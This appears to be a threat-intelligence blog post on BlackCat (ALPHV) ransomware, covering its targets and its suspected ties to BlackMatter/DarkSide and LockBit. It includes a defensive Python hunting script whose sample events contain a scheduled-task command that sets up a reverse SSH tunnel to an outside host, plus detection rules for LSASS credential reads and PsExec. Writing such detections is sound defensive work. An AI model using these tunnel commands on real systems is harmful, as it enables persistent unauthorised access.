In our PolySwarm 2021 Year in Review, we made several predictions for this year, including that BlackCat ransomware would become more prevalent, due to its sophistication. BlackCat ransomware is ransomware as a service (RaaS), which was recently linked to the BlackMatter/DarkSide ransomware gang in a report by Cisco Talos.
What is BlackCat?
BlackCat, also known as ALPHV, was first observed in late 2021. BlackCat is a RaaS that includes a highly customizable feature set, allowing for attacks on a wide range of targets. BlackCat is written in Rust, a language seldom used by ransomware developers, and can infect both Windows and Linux machines. The ransomware is being promoted on Russian-language hacking forums.
BlackCat attacks have occurred in the US, Europe, the Philippines, and other regions. Verticals targeted include construction and engineering, retail, transportation, commercial services, insurance, machinery, professional services, telecommunication, auto components, and pharmaceuticals. Palo Alto’s Unit 42 noted several reasons for the growing popularity of BlackCat. First, the group has been effective in marketing to its affiliates, and affiliates receive a generous share of ransom payments. Second, the malware is perhaps the first ransomware written in Rust. Developers can easily change the code to pivot and individualize attacks. Third, the threat actors behind BlackCat use double and triple extortion tactics, charging a ransom to decrypt files and threatening to disclose files or engage in DDoS attacks if the ransom is not paid.
Industry researchers have speculated about a connection between BlackCat and the BlackMatter/DarkSide ransomware gang, who attacked Colonial Pipeline last year. Researchers at Cisco Talos provided a comparison of BlackCat and BlackMatter attacks they observed. They noted that a domain and IP address associated with BlackCat were previously used as a C2 in a BlackMatter attack. At this time, the initial infection vector used in the BlackCat attacks analyzed by Cisco Talos is unknown. However, in a BlackMatter attack they analyzed, the threat actors likely established initial access by exploiting Microsoft Exchange vulnerabilities.
Cisco Talos also noted other commonalities in BlackCat and BlackMatter TTPs:
- Both ransomware families use reverse SSH tunnels and scheduled tasks to maintain persistence
- Both target LSASS for credential access
- Both use Impacket, RDP, and PsExec for command and control
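The indicators in that list (a scheduled task that launches a reverse SSH tunnel, a non-system process reading LSASS memory, the PsExec service binary appearing on a host) are concrete enough to hunt for in endpoint telemetry. The script below is an added example, not code from PolySwarm or Cisco Talos: it runs a few Sysmon-style rules over constructed event records. The events, the allowlist of processes permitted to open LSASS, and the chosen access mask are all assumptions made for the illustration and should be tuned to your own environment.

```python
"""Hunt for the BlackCat/BlackMatter TTPs listed above in Sysmon-style events.

Added example (not PolySwarm's or Talos's code). All events below are
constructed; EventID 1 = process creation, EventID 10 = process access.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry: one benign task, one tunnel, one LSASS read
# by an unexpected process, one legitimate LSASS access, one PsExec service.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc onlogon /tn "Updater" /tr '
                    r'"C:\ProgramData\ssh.exe -N -R 2222:127.0.0.1:3389 '
                    r'-i C:\ProgramData\k svc@203.0.113.10"'},
    {"EventID": 1, "Image": r"C:\ProgramData\ssh.exe",
     "CommandLine": r"C:\ProgramData\ssh.exe -N -R 2222:127.0.0.1:3389 "
                    r"-i C:\ProgramData\k svc@203.0.113.10"},
    {"EventID": 10, "SourceImage": r"C:\Users\a\AppData\Local\Temp\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Windows\PSEXESVC.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\PSEXESVC.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# ssh / ssh.exe invoked with -R: a remote (reverse) port forward back to the operator.
SSH_REVERSE_TUNNEL = re.compile(r"\bssh(?:\.exe)?\b.*?\s-R\s*\S+", re.IGNORECASE)
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\b.*\s/create\b", re.IGNORECASE)

# PROCESS_VM_READ: the right a credential dumper needs to read LSASS memory.
PROCESS_VM_READ = 0x0010
# Hypothetical allowlist of system processes that legitimately open LSASS.
LSASS_ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of / and \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_reverse_ssh_tunnel(cmdline: str) -> bool:
    return bool(SSH_REVERSE_TUNNEL.search(cmdline))


def is_ssh_tunnel_task(cmdline: str) -> bool:
    """schtasks /create whose action (/tr) is a reverse SSH tunnel: persistence."""
    return bool(SCHTASKS_CREATE.search(cmdline)) and is_reverse_ssh_tunnel(cmdline)


def is_lsass_read(event: Dict[str, object]) -> bool:
    """Non-allowlisted process opening lsass.exe with VM_READ: credential access."""
    if event.get("EventID") != 10:
        return False
    if basename(str(event.get("TargetImage", ""))) != "lsass.exe":
        return False
    if basename(str(event.get("SourceImage", ""))) in LSASS_ALLOWED_SOURCES:
        return False
    granted = int(str(event.get("GrantedAccess", "0x0")), 16)
    return bool(granted & PROCESS_VM_READ)


def is_psexec_service(event: Dict[str, object]) -> bool:
    """PSEXESVC.exe is the service binary Sysinternals PsExec drops on the target."""
    return event.get("EventID") == 1 and basename(str(event.get("Image", ""))) == "psexesvc.exe"


def hunt(events: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """Return (event index, finding) pairs for every rule that fires."""
    findings: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        cmd = str(ev.get("CommandLine", ""))
        if ev.get("EventID") == 1:
            if is_ssh_tunnel_task(cmd):
                findings.append((i, "persistence: scheduled task launching reverse SSH tunnel"))
            elif is_reverse_ssh_tunnel(cmd):
                findings.append((i, "c2/persistence: reverse SSH tunnel"))
            if is_psexec_service(ev):
                findings.append((i, "c2/lateral movement: PsExec service binary"))
        if is_lsass_read(ev):
            findings.append((i, "credential access: LSASS memory read"))
    return findings


if __name__ == "__main__":
    for idx, finding in hunt(SAMPLE_EVENTS):
        print(f"event[{idx}]: {finding}")
```

Feed it real Sysmon JSON (or the equivalent EDR fields) instead of SAMPLE_EVENTS; the rules are deliberately narrow, so expect to widen the LSASS allowlist for backup agents and AV engines in your fleet, and to pair the reverse-tunnel rule with network telemetry showing the outbound SSH session.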
An individual associated with BlackCat said the group is not a rebranding of BlackMatter, but its team members are affiliated with other RaaS groups. However, another individual associated with the LockBit gang said BlackCat is a rebrand of DarkSide/BlackMatter, and researchers at Cybereason found commonalities and shared infrastructure between BlackCat and LockBit.
PolySwarm has multiple samples of BlackCat. A selection of IOCs for these samples is found below.
You can use the following CLI command to search for all BlackCat samples in our portal:
$ polyswarm link list -f BlackCat
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.